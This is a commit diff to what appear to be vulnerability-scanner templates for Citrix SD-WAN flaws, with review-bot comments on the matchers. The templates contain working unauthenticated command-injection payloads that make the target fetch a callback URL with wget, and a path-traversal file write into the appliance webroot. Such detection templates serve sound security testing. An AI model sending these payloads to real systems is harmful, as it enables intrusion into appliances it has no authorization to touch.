added additional matcher and shodan query

patch-1
Dhiyaneshwaran 2023-03-29 11:54:45 +05:30
parent 297bc113b9
commit cd647411ad
5 changed files with 68 additions and 9 deletions


@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12985
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/diagnostics/ping HTTP/1.1
Host: {{Hostname}}
@ -25,8 +31,14 @@ requests:
ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
req-condition: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'
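Review bot: The `dsl` matcher added at the end of this section has no comment, while the word matcher above it carries `# Confirms the HTTP Interaction`; I would add `# Fingerprints the Citrix SD-WAN login page (request 1) so a callback from an unrelated host is not reported` above `- type: dsl`. The check is an exact, case-sensitive substring of `body_1`, so a login page whose title differs, or a `/login` that answers with a redirect, would presumably turn into a silent false negative; that limit is worth stating in the same comment. The same matcher is added unchanged in the CVE-2019-12986, CVE-2019-12987 and CVE-2019-12988 sections below, and the comment applies there too. The `requests` block runs across both hunks and is not fully visible here.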


@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12986
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/diagnostics/trace_route HTTP/1.1
Host: {{Hostname}}
@ -25,8 +31,14 @@ requests:
ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
req-condition: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'


@ -14,18 +14,30 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12987
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |+
GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'


@ -14,18 +14,30 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12988
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |+
GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'


@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12990
cwe-id: CWE-22
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1
Host: {{Hostname}}
@ -25,11 +31,16 @@ requests:
filename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=
- |
GET /talari/app/files/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(all_headers, "text/html")'
- 'status_code_3 == 200'
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'
condition: and
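Review bot: `contains(all_headers, "text/html")` is the only condition in the new `dsl` matcher without a request index, although `req-condition: true` is set and the other two conditions pin `status_code_3` and `body_1`; if the header check is meant for the read-back of the written file, write it as `contains(all_headers_3, "text/html")`. None of the three conditions ties response 3 to the file that request 2 wrote (the visible `filedata=` is empty), so a host that answers 200 with `text/html` for any path under `/talari/app/files/` would presumably still match once the title check passes. The template also leaves the written file on the appliance; a comment in the template saying that the `{{randstr}}` file has to be removed after a scan would help operators. The second raw request's headers lie between the two hunks and are not visible here.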